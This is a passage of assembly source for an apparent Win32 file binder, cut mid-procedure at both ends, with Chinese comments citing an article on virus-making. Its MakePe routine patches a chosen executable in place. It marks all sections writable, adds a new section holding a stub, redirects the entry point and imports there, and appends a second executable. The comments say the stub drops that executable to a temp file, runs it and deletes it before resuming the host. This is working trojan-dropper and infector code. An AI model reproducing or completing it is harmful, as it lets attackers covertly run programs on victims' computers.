📄 ee.asm
NULL,OPEN_EXISTING, \
FILE_ATTRIBUTE_NORMAL,NULL
mov [tempfileh],eax
.if eax==INVALID_HANDLE_VALUE
call MessageBoxA,[MainhWnd],offset ErrA_str,offset Err_Title,64
mov eax,0
jmp exit_initfile
.else
call GetFileSize,[tempfileh],NULL
mov ecx,1024
cdq
div ecx
mov [FileCSize],eax
.endif
call CloseHandle,[tempfileh]
; 检查A文件存不存在,并计算A文件的大小。
;------------------------------------(上面的)--
call CreateFileA,offset buffert,GENERIC_READ or GENERIC_WRITE, \
FILE_SHARE_READ or FILE_SHARE_WRITE, \
NULL,OPEN_EXISTING, \
FILE_ATTRIBUTE_NORMAL,NULL
mov [tempfileh],eax
.if eax==INVALID_HANDLE_VALUE
call MessageBoxA,[MainhWnd],offset ErrB_str,offset Err_Title,64
mov eax,0
jmp exit_initfile
.else
call GetFileSize,[tempfileh],NULL
mov ecx,1024
cdq
div ecx
mov [FileBSize],eax
.endif
call CloseHandle,[tempfileh]
; 检查B文件存不存在,并计算B文件的大小
;------------------------------------(上面的)--
call RtlZeroMemory,offset bakfile,size bakfile
call lstrcpy,offset bakfile,offset buffer
call lstrcat,offset bakfile,offset BakFilter
call CopyFileA,offset buffer,offset bakfile,0
mov eax,1
; 将源文件备份一下
;------------------------------------(上面的)--
exit_initfile:
ret
initfile endp
;-------------------------------------------------------------------------------
; SelectAFile - show the common "Open" dialog for file A.
; In:    nothing (uses the globals MainhWnd, vhInstance, VFile, buffer)
; Out:   buffer = path picked by the user; dialog item VZL_SRCTA shows it
; Clobb: eax and whatever the Win32 calls clobber
; Note:  `buffer` is the path that MakePe later opens read/write and patches
;        in place, so file A is the file that gets modified.
;-------------------------------------------------------------------------------
SelectAFile proc                                ; choose file A
        ; Start from an all-zero OPENFILENAME so unused fields stay 0.
        call    RtlZeroMemory,offset VFile,size VFile
        mov     [VFile.lStructSize],size VFile

        mov     eax,[MainhWnd]                  ; dialog owner = main window
        mov     [VFile.hwndOwner],eax
        mov     eax,[vhInstance]
        mov     [VFile.hInstance],eax

        mov     [VFile.lpstrFilter],offset FileFilter
        mov     byte ptr [buffer],0             ; no pre-filled file name
        mov     [VFile.lpstrFile],offset buffer
        mov     [VFile.nMaxFile],size buffer    ; dialog may not write past buffer
        mov     [VFile.lpstrTitle],offset OpenFileTitle
        mov     [VFile.vFlags],OFN_FILEMUSTEXIST or OFN_HIDEREADONLY or OFN_PATHMUSTEXIST or OFN_EXPLORER or OFN_LONGNAMES

        call    GetOpenFileNameA,offset VFile
        test    eax,eax                         ; 0 = cancelled or failed
        jz      SelectAFile_done
        call    SetDlgItemTextA,[MainhWnd],VZL_SRCTA,offset buffer
SelectAFile_done:
        ret
SelectAFile endp
;-------------------------------------------------------------------------------
; SelectBFile - show the common "Open" dialog for file B.
; In:    nothing (uses the globals MainhWnd, vhInstance, VFileB, buffert)
; Out:   buffert = path picked by the user; dialog item VZL_SRCTB shows it
; Clobb: eax and whatever the Win32 calls clobber
; Note:  `buffert` is the path MakePe hands to ReadWriteFileS as the source,
;        so file B is the file whose contents are appended to file A.
;-------------------------------------------------------------------------------
SelectBFile proc                                ; choose file B
        ; Start from an all-zero OPENFILENAME so unused fields stay 0.
        call    RtlZeroMemory,offset VFileB,size VFileB
        mov     [VFileB.lStructSize],size VFileB

        mov     eax,[MainhWnd]                  ; dialog owner = main window
        mov     [VFileB.hwndOwner],eax
        mov     eax,[vhInstance]
        mov     [VFileB.hInstance],eax

        mov     [VFileB.lpstrFilter],offset FileFilter
        mov     byte ptr [buffert],0            ; no pre-filled file name
        mov     [VFileB.lpstrFile],offset buffert
        mov     [VFileB.nMaxFile],size buffert  ; dialog may not write past buffert
        mov     [VFileB.lpstrTitle],offset OpenFileTitleB
        mov     [VFileB.vFlags],OFN_FILEMUSTEXIST or OFN_HIDEREADONLY or OFN_PATHMUSTEXIST or OFN_EXPLORER or OFN_LONGNAMES

        call    GetOpenFileNameA,offset VFileB
        test    eax,eax                         ; 0 = cancelled or failed
        jz      SelectBFile_done
        call    SetDlgItemTextA,[MainhWnd],VZL_SRCTB,offset buffert
SelectBFile_done:
        ret
SelectBFile endp
;===============================================================================
; 以下的大部份代码请参阅我以前的两篇文章
; 《Win98病毒制作原理-完整版》
; 《PE引入表修改实战》
;-------------------------------------------------------------------------------
; MakePe - patch the PE file named in `buffer` in place.
;
; What the visible code does, in order:
;   1. Reads the dword at file offset 3Ch (e_lfanew) and then Head_len bytes
;      of PE headers into PE_head.
;   2. Saves the original AddressOfEntryPoint and ImageBase (now_in, now_base,
;      BASE_RVA, now_basein, Src_addr) and the original import directory RVA
;      (MI_RVA).
;   3. Stops with a message box if one more 28h-byte section header would not
;      fit inside SizeOfHeaders.
;   4. ORs 80000000h (IMAGE_SCN_MEM_WRITE) into every section's
;      Characteristics and appends the header held in new_section.
;   5. Points the import directory and AddressOfEntryPoint into the new
;      section and zeroes the bound-import directory RVA.
;   6. Writes the headers back, writes the block that starts at vstart after
;      the last section's raw data, then calls ReadWriteFileS to append the
;      file named in `buffert` behind it.
;
; Out:  [CreateOK] = 1 when the innermost branch ran to its end. eax is in the
;       `uses` list, so the final `mov eax,0` is not visible to the caller.
;
; For analysts: a file processed by this routine has every section marked
; writable, an extra last section that holds both the entry point and the
; import directory, a zeroed bound-import RVA, and the bytes of a second file
; stored after the raw data of that last section.
; NOTE(review): no MZ/PE signature check is visible in this routine; the
; header values read from the file are used as they are.
;-------------------------------------------------------------------------------
MakePe proc uses edi esi eax ecx edx ebx
; Open file A (path in `buffer`) for reading and writing.
call CreateFileA,offset buffer,GENERIC_READ or GENERIC_WRITE, \
FILE_SHARE_READ or FILE_SHARE_WRITE, \
NULL,OPEN_EXISTING, \
FILE_ATTRIBUTE_NORMAL,NULL
.if eax!=INVALID_HANDLE_VALUE
mov [hFile],eax
; Offset 3Ch of the DOS header holds e_lfanew, the file offset of the PE header.
call SetFilePointer,[hFile],3ch,0,FILE_BEGIN
call ReadFile,[hFile],offset PE_head_addr,4,offset byte_read,0
.if eax!=0
; Read Head_len bytes starting at the PE header into PE_head.
; The result of this second ReadFile is not tested.
call SetFilePointer,[hFile],[PE_head_addr],0,FILE_BEGIN
call ReadFile,[hFile],offset PE_head,Head_len,offset byte_read,0
; Keep the original entry point RVA and image base before they are changed.
push [PE_head.OptionalHeader.AddressOfEntryPoint]
pop [now_in]
push [PE_head.OptionalHeader.ImageBase]
pop [now_base]
push [PE_head.OptionalHeader.ImageBase]
pop [BASE_RVA]
; now_basein = Src_addr = ImageBase + original entry point RVA.
mov eax,[now_in]
add eax,[now_base]
mov [now_basein],eax
mov [Src_addr],eax
; Section table offset relative to the PE header:
; 18h (4-byte signature + 14h-byte file header) + SizeOfOptionalHeader.
movzx eax,[PE_head.FileHeader.SizeOfOptionalHeader]
add eax,18h
mov [Section_addr],eax
; Size of the block between the labels vstart and vend.
mov [checker_len],offset vend-offset vstart
; eax = file offset just past the section table once one more
; 28h-byte header has been added.
movzx eax,[PE_head.FileHeader.NumberOfSections]
inc eax
mov ecx,28h
mul ecx
add eax,[Section_addr]
add eax,[PE_head_addr]
; No free room for another section header: report and do nothing else.
; (The message text is ErrB_str, the same string initfile shows for file B.)
.if eax>[PE_head.OptionalHeader.SizeOfHeaders]
call MessageBoxA,[MainhWnd],offset ErrB_str,offset Err_Title,64
.else
mov esi,offset Section_table
;--------------------------------------\/---
; Walk all existing section headers and set bit 80000000h
; (IMAGE_SCN_MEM_WRITE) in Characteristics at header offset 24h.
; pushad/popad restore every register, so esi is Section_table again afterwards.
pushad
push esi
push ecx
movzx ecx,[PE_head.FileHeader.NumberOfSections]
loops:
.if ecx==0
jmp loopend
.endif
or [esi+24h],80000000h
add esi,28h
dec ecx
jmp loops
loopend:
pop ecx
pop esi
popad
; All section attributes have now been changed.
;------------------------------------(above)--
; esi = first free slot after the last existing section header.
movzx eax,[PE_head.FileHeader.NumberOfSections]
mov ecx,28h
mul ecx
add esi,eax
inc [PE_head.FileHeader.NumberOfSections]
; After the xchg: edi = free slot in the table, esi = new_section template.
mov edi,offset new_section
xchg edi,esi
; edi-28h is the last existing header:
; offset 8 = VirtualSize, offset 0Ch = VirtualAddress.
mov eax,[edi-28h+8]
add eax,[edi-28h+0ch]
;--------------------------------------------------
mov [temp_virt_addr],eax ; save the RVA before alignment
;--------------------------------------------------
; Round eax up to a multiple of SectionAlignment -> RVA of the new section.
mov ecx,[PE_head.OptionalHeader.SectionAlignment]
cdq
div ecx
test edx,edx
jz nextgoa
inc eax
nextgoa:
mul ecx
mov [new_section.virt_addr],eax
;---------------------------save the original import table--
; NOTE(review): the index in DataDirectory(n) looks like a byte offset
; (8 = entry 1, import; 88 = entry 11, bound import), which matches the
; original comments - confirm against the structure definition.
mov eax,[PE_head.OptionalHeader.DataDirectory(8).VirtualAddress]
mov [MI_RVA],eax
;------------------zero IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT---
push 0
pop [PE_head.OptionalHeader.DataDirectory(88).VirtualAddress]
;----------------------------fill in the import table--------
; eax = RVA that v_ImportA will have inside the new section.
mov eax,v_ImportA-vstart
add eax,[new_section.virt_addr]
mov [PE_head.OptionalHeader.DataDirectory(8).VirtualAddress],eax
mov [PE_head.OptionalHeader.DataDirectory(8).isize],Import_len
; Add that RVA to each dword listed below. The dwords live in this program's
; own copy of the vstart block and are changed in place; presumably they are
; stored relative to v_ImportA (their definitions are outside this view).
add dword ptr [v_ImportA],eax
add dword ptr [v_DllNameA],eax
add dword ptr [v_FThunkA],eax
add dword ptr [Ker_API],eax
add dword ptr [Ker_API+4],eax
add dword ptr [Ker_API+8],eax
add dword ptr [Ker_API+0Ch],eax
add dword ptr [Ker_API+10h],eax
add dword ptr [Ker_API+14h],eax
add dword ptr [Ker_API+18h],eax
add dword ptr [Ker_API+1Ch],eax
add dword ptr [Ker_API+20h],eax
add dword ptr [Ker_API+24h],eax
add dword ptr [Ker_API+28h],eax
add dword ptr [Ker_API+2Ch],eax
add dword ptr [Ker_API+30h],eax
add dword ptr [Ker_API+34h],eax
add dword ptr [Ker_API+38h],eax
add dword ptr [Ker_API+3ch],eax
add dword ptr [Ker_API+40h],eax
add dword ptr [vGetProcAddress],eax
add dword ptr [vGetModuleHandleA],eax
add dword ptr [vLoadLibraryA],eax
add dword ptr [vExitProcess],eax
add dword ptr [vCreateFileA],eax
add dword ptr [vCreateFileMappingA],eax
add dword ptr [vGetTempPathA],eax
add dword ptr [vGetTempFileNameA],eax
add dword ptr [vlstrlen],eax
add dword ptr [vMapViewOfFile],eax
add dword ptr [vWriteFile],eax
add dword ptr [vUnmapViewOfFile],eax
add dword ptr [vCloseHandle],eax
add dword ptr [vCopyFileA],eax
add dword ptr [vGetModuleFileNameA],eax
add dword ptr [vDeleteFileA],eax
add dword ptr [vWinExec],eax
add dword ptr [v_ImportB],eax
add dword ptr [v_DllNameB],eax
add dword ptr [v_FThunkB],eax
add dword ptr [Use_API],eax
add dword ptr [vMessageBoxA],eax
;-----------------------------------------
mov eax,[checker_len]
;--------------------------------------------------
mov [temp_raw_size],eax ; save the raw size before alignment
;--------------------------------------------------
; raw_size = checker_len rounded up to FileAlignment.
; edx is not reset before this div (nor before the two below); it still
; holds the high dword left by the preceding mul.
mov ecx,[PE_head.OptionalHeader.FileAlignment]
div ecx
test edx,edx
jz nextgob
inc eax
nextgob:
mul ecx
mov [new_section.raw_size],eax
; virt_size = checker_len rounded up to SectionAlignment.
mov eax,[checker_len]
mov ecx,[PE_head.OptionalHeader.SectionAlignment]
div ecx
test edx,edx
jz nextgoc
inc eax
nextgoc:
mul ecx
mov [new_section.virt_size],eax
; raw_offset = last existing section's PointerToRawData (14h)
; + SizeOfRawData (10h), i.e. directly behind its raw data.
mov eax,[edi-28h+14h]
add eax,[edi-28h+10h]
mov [new_section.raw_offset],eax
;-------------------------------------------------------
; SizeOfImage = (new section RVA + unaligned size) rounded up to SectionAlignment.
mov eax,[new_section.virt_addr]
add eax,[temp_raw_size]
mov ecx,[PE_head.OptionalHeader.SectionAlignment]
div ecx
test edx,edx
jz nextgod
inc eax
nextgod:
mul ecx
mov [PE_head.OptionalHeader.SizeOfImage],eax
; Copy the 28h-byte new_section header (esi) into the free table slot (edi).
mov ecx,28h
rep movsb
; The entry point now is the start of the new section, where vstart is written.
mov eax,[new_section.virt_addr]
mov [PE_head.OptionalHeader.AddressOfEntryPoint],eax
; Write the modified headers back over the originals.
call SetFilePointer,[hFile],[PE_head_addr],0,FILE_BEGIN
call WriteFile,[hFile],offset PE_head,Head_len,offset byte_read,0
; Position file A at the raw offset of the new section.
call SetFilePointer,[hFile],[new_section.raw_offset],0,FILE_BEGIN
;-----------------------------------
push eax
; Save_add = file offset just past the new section's raw data;
; it is passed to ReadWriteFileS below as the write offset.
mov eax,[new_section.raw_size]
add eax,[new_section.raw_offset]
mov [Save_add],eax
; Open file B only to read its size into Save_size.
; The handle returned here is not compared with INVALID_HANDLE_VALUE.
lea eax,[buffert]
call CreateFileA,eax,GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL
mov [hFile_st],eax
call GetFileSize,[hFile_st],NULL
mov [Save_size],eax ; store the size of the file
call CloseHandle,[hFile_st]
pop eax
;-----------------------------------
; Write raw_size bytes starting at vstart into file A at raw_offset.
mov eax,offset vstart
call WriteFile,[hFile],eax,[new_section.raw_size],offset byte_read,0
call CloseHandle,[hFile]
; hFile = 0 so the clean-up at the end of the procedure does not close it again.
push 0
pop [hFile]
lea eax,[buffert]
lea edx,[buffer]
call ReadWriteFileS,eax,edx,[Save_add]
; Call ReadWriteFileS.
; Arguments: the paths of the two EXE files and the offset of the end of the PE file.
;------------------------------------(above)--
mov [CreateOK],1
.endif
.endif
.endif
; Close hFile if it is still non-zero (the completed path zeroed it above).
mov eax,0
.if [hFile]!=eax
call CloseHandle,[hFile]
.endif
ret
MakePe endp
;-------------------------------------------------------------------------------
; ReadWriteFileS - copy the whole of one file into another at a given offset.
; In:    SFilepath = path of the source file (MakePe passes `buffert`, file B)
;        DFilepath = path of the destination file (MakePe passes `buffer`)
;        WOffaddr  = file offset in the destination where writing starts
; Out:   [Save_size] = size of the source file; eax = result of the last
;        CloseHandle
; Clobb: ecx and flags; edx, edi, esi are preserved by `uses`
; Note:  none of the API results is checked in this routine.
;        The source is written exactly as it is mapped. The original author
;        remarks that the mapping would make it easy to encrypt the second
;        file before the write and to decrypt it on extraction; this code
;        does not do that, so the second file sits unmodified at WOffaddr.
;-------------------------------------------------------------------------------
ReadWriteFileS proc uses edx edi esi,SFilepath:dword,DFilepath:dword,WOffaddr
        ; Open the source and create a file mapping object for it.
        call    CreateFileA,[SFilepath],GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL
        mov     [hFile_s],eax
        call    CreateFileMappingA,eax,NULL,PAGE_READWRITE,0,0,NULL
        mov     [hFMap_s],eax

        ; Open the destination.
        call    CreateFileA,[DFilepath],GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL
        mov     [hFile_d],eax

        ; Map the source file into memory.
        call    MapViewOfFile,[hFMap_s],FILE_MAP_WRITE,0,0,0
        mov     [hMemory],eax

        ; Position the destination, then write the whole mapped source there.
        call    SetFilePointer,[hFile_d],[WOffaddr],0,FILE_BEGIN
        call    GetFileSize,[hFile_s],NULL
        mov     [Save_size],eax                 ; store the size of the file
        call    WriteFile,[hFile_d],[hMemory],eax,offset ReadBye,NULL

        ; Release the view, the mapping object and both file handles.
        call    UnmapViewOfFile,[hMemory]
        call    CloseHandle,[hFMap_s]
        mov     [hFMap_s],0
        call    CloseHandle,[hFile_s]
        call    CloseHandle,[hFile_d]
        ret
ReadWriteFileS endp
;================================================================================
;================================================================================
; 以下部份就是写入生成的EXE文件的部份啦
; 大体操作:
; 取得临时文件名,将文件读出来,并保存为EXE文件;
; 再执行这个EXE文件,删除临时文件。
; 导入原文件引入表,返回原PE文件的入口
.data
vstart:
call nowstart
nowstart:
pop ebp
sub ebp,offset nowstart
;==========================输入文件参数表============